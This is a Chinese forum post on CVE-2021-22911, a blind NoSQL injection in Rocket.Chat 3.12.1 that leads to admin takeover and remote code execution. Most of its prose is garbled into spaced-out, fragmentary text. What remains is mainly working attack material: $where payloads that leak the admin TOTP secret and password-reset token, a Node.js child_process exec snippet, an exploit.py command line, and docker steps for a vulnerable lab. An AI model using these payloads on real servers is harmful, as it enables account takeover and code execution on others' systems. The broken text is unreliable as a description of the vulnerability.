搜索

[29062] 2021-07-12_【安全工具】CVE-2021-22911预认证盲NoSQL注入导致RocketChat3.12.1中的远程代码执行

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-19
2021-07-12_【安全工具】CVE-2021-22911预认证盲NoSQL注入导致RocketChat3.12.1中的远程代码执行 C V E - 2 0 2 1 - 2 2 9 1 1   N o S Q L     R o c k e t   C h a t   3 . 1 2 . 1   O t s   2 0 2 1 - 0 7 - 1 2 O t s C V E - 2 0 2 1 - 2 2 9 1 1   N o S Q L     R o c k e t   C h a t   3 . 1 2 . 1   g e t P a s s w o r d P o l i c y     N o S Q L   / 1 .   g e t P a s s w o r d P o l i c y   N o S Q L     j s o n   使 $ r e g e x 使   n o s q l   2 .   a d m i n 2 f a 使   ( 1 )     2 f a   u s e r s . l i s t   a p i     n o s q l     2 f a       ( 1 )   使   2 f a     2 f a   s e c r e t   3 .   R C E   -   R o c k e t . C h a t   使   w e b h o o k     r c e   : )   2 f a   (   - u   )   a d m i n     2 f a     -     R o c k e t   C h a t   3 . 1 2 . 1   使   d o c k e r     2 F A 使   2 F A   使 { " $ w h e r e " : " t h i s . u s e r n a m e = = = ' a d m i n ' + & & + ( ( ) = > { + t h r o w + t h i s . s e r v i c e s . t o t p . s e c r e t + } ) ( ) " } { " $ w h e r e " : " t h i s . u s e r n a m e = = = ' a d m i n ' + & & + ( ( ) = > { + t h r o w + t h i s . s e r v i c e s . p a s s w o r d . r e s e t . t o k e n + } ) ( ) " } c o n s t   r e q u i r e   =   c o n s o l e . l o g . c o n s t r u c t o r ( ' r e t u r n   p r o c e s s . m a i n M o d u l e . r e q u i r e ' ) ( ) ; c o n s t   {   e x e c   }   =   r e q u i r e ( ' c h i l d _ p r o c e s s ' ) ; e x e c ( ' c o m m a n d   h e r e ' ) ; p y t h o n 3   e x p l o i t . p y   - u   " u s e r @ r o c k e t . l o c a l "   - a   " a d m i n @ r o c k e t . l o c a l "   - t   " h t t p : / / r o c k e t . l o c a l " d o c k e r   r u n   - - n a m e   d b   - d   m o n g o : 3 . 6   - - s m a l l f i l e s   - - r e p l S e t   r s 0   - - o p l o g S i z e   1 2 8 d o c k e r   e x e c   - t i   d b   m o n g o   - - e v a l   " p r i n t j s o n ( r s . i n i t i a t e ( ) ) " d o c k e r   r u n   - - n a m e   r o c k e t c h a t   - p   8 0 : 3 0 0 0   - - l i n k   d b   - - e n v   R O O T _ U R L = h t t p : / / l o c a l h o s t   - - e n v   M O N G O _ O P L O G _ U R L = m o n g o d b : / / d b : 2 7 0 1 7 / l o c a l   - d   r o c k e t . c h a t : 3 . 1 2 . 1 #   A d m i n   A c c o u n t   T a k o v e r   [   N o   2 f a   ] f o r g o t p a s s w o r d ( a d m i n m a i l , t a r g e t )
h t t p s : / / h a c k e r o n e . c o m / r e p o r t s / 1 1 3 0 7 2 1 h t t p s : / / b l o g . s o n a r s o u r c e . c o m / n o s q l - i n j e c t i o n s - i n - r o c k e t - c h a t h t t p s : / / w w w . e x p l o i t - d b . c o m / e x p l o i t s / 4 9 9 6 0   (   v 1   ) h t t p s : / / w w w . e x p l o i t - d b . c o m / e x p l o i t s / 5 0 1 0 8   (   v 2   ) t o k e n   =   r e s e t t o k e n ( t a r g e t ) c h a n g i n g p a s s w o r d ( t a r g e t , t o k e n )
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理